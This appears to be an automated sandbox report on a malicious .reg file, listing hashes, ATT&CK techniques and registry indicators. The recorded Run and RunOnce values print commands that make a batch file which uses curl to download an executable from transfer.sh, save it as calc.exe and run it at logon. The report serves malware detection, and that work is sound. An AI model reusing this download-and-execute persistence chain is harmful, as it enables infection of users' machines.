5f43441ad8974898b11cbad644952eaaa6e00ce99acf81986b7978d445b1ed97

Analysis

max time kernel
143s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
02/10/2023, 13:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

output.reg%0A%0ATestMessage%0A%.reg
Size

32KB
MD5

1dbc3189e54410317b139cd038272160
SHA1

76c5bcf5a90aef9a4f5925e41f1547d62435e145
SHA256

5f43441ad8974898b11cbad644952eaaa6e00ce99acf81986b7978d445b1ed97
SHA512

45b5f559bcdd525141af97ae14b6c5bf3666d983f4fbe2fb46fea574bd6268a73ea0fada56a07f27436478c7c08df00926c96a0842158a802ab50a2b512c6cbb
SSDEEP

768:qw1TAPEbFnXkRO690b0l9ew1TAPEbFnXkRO690b0g:qiTAP0Nc904uiTAP0Nc904g

Score

6^/10

persistence

Malware Config

Signatures

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hrGGph6i = "cmd /c echo echo @echo off & echo curl https://transfer.sh/C70yoaGl7R/aida64extreme692.exe -o %temp%\\calc.exe & echo %temp%\\calc.exe & echo exit > %temp%\\hrGGph6i.bat"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\hrGGph6i = "cmd /c echo start /min cmd /c %temp%\\hrGGph6i.bat >> c:\\Users\\public\\hrGGph6i.bat"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\hrGGph6i = "c:\\Users\\public\\hrGGph6i.bat"	regedit.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\TypeLib\wAA7VEe9xP	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\CLSID\J1zGPMg9Oy\9X9u8al8tV = "B0XLR2BW2y"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\TypeLib\3FLzed4Mti	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\CLSID\1gZKKiInD0\KnLNwJaFDC = "Ta9NLvpvtf"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\AppID\f2j0AyHt1h	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\TypeLib\etCMxqvFFM\UXT7g5nIaW = "7uLQzi7VaF"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\p5mjfdxzhm\JvTzVYCfGD = "e5I1KPe9J5"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\AppID\zU9Q1i4ZTH	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\AppID\zU9Q1i4ZTH\Igd6ANKcUF = "clDx4Q6jrc"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\M5W90wYaKJ	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\CLSID\M0n6Ubs78V	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\AppID\1BMn7v6Ix6	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Interface\WPOYJcgAEG\IXLur5mM4L = "hq7pdfRvBn"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\Interface\266fqZT6oF\8coEyIHfAd = "nHfkH0d05L"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\AppID\4GdIsOCV3v	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\TypeLib\2tcpqaVt9Y\JxiMphZcCH = "vWfD8wmuiM"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\AppID\f2j0AyHt1h\5Ux4XIwDdv = "7yUacdyp6S"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\CLSID\0Ip7FWR3kw	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\CLSID\0Ip7FWR3kw\ZcSTDJqyAM = "90SiEYXAyD"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\AppID\2GordH5paw	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Interface\WPOYJcgAEG	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\Interface\266fqZT6oF	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Interface\fUpKm6HxVW	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\TypeLib\8vMGj9Xc7F\fjAyQYmbEq = "59eeAznhFw"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\Interface\TvrgbumIa6	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\CLSID\jdXDcMkmDq	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\TypeLib\PAMs9heCAf\Ct5BBJDghG = "V6oX6rg4Pw"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\AppID\1BMn7v6Ix6	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\TypeLib\iY7Ostjpux	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Interface\6P6tYUiKA2	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\CLSID\jdXDcMkmDq\t1BA7lCbAB = "b7XiHqqj3q"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\TypeLib\3FLzed4Mti\wkghsTzB6r = "J6hDDpLPi3"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\Interface\ZoGylIurZP	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\AppID\3HG32oJ8fZ	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\AppID\3HG32oJ8fZ\jXna36sK60 = "DQvMDJzFPy"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\CLSID\7mMtOZpgnB	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\CLSID\YFvtUN7Iqf\QqCTDXEM2b = "JPS4vXBvxM"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\dT7bnk2nq3	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\TypeLib\JwOUWz2B6k	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\AppID\YFvYpw8SzD\F6gGRqvrdD = "bOzli3h7IY"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\TypeLib\TjA3TDzE8C\osFaHPEfli = "Rny69uQ9ON"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\TypeLib\3Hk9cjMEJa\oQFTn6ajRz = "UA1zwJC84b"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\AppID\2GordH5paw\O7jlsSaqoN = "aNQ6DzX55o"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\CLSID\WK9VwfHFPg	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\CLSID\4HTRbrPqiD	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Interface\8B2wbHEG4O	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\CLSID\3AN877CZXw\g7SIgwDa2Z = "XNn60rtsgA"	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\Interface\taReKJD57c\crKnYNnz0S = "rQCzPijs5G"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\TypeLib\HeJNojZ08m	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Interface\Kbpif4yGVy\hwEtpVVK3W = "eDybEVWiv5"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\TypeLib\3K1ZwWjkJw	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\CLSID\sXhsJV4dhv\OtU5m7hPBU = "A7xXhxanAS"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\Interface\oFmO67jJHE	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\Interface\oFmO67jJHE\MTug9AUxlO = "goJE23Xi8A"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\CLSID\GR52efybWM	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\AppID\qrgprWBVXG\pAqV88hRJY = "x34UA9xRWB"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\Interface\2OqdztKWPg	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\CLSID\YFvtUN7Iqf	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\WOW6432Node\Interface\TvrgbumIa6\xtNyOzKOFI = "m5y51mJTiT"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\TypeLib\yPRhxnOCpc	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\ou3k1ZOYoR\RJ4oF7iPwl = "OeJ8Tcq0sz"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\AppID\YFvYpw8SzD	regedit.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\TypeLib\3K1ZwWjkJw\pTljgzDpc3 = "7wl697Ttcx"	regedit.exe
Key created	\REGISTRY\USER\S-1-5-21-919254492-3979293997-764407192-1000_Classes\Wow6432Node\TypeLib\QkvnljB7J4	regedit.exe

Runs .reg file with regedit 1 IoCs

pid	Process
3676	regedit.exe

C:\Windows\regedit.exe
regedit.exe "C:\Users\Admin\AppData\Local\Temp\output.reg%0A%0ATestMessage%0A%.reg"
1⤵
- Adds Run key to start application
- Modifies registry class
- Runs .reg file with regedit
PID:3676

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Windows 7 deprecation

Loading Replay Monitor...

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads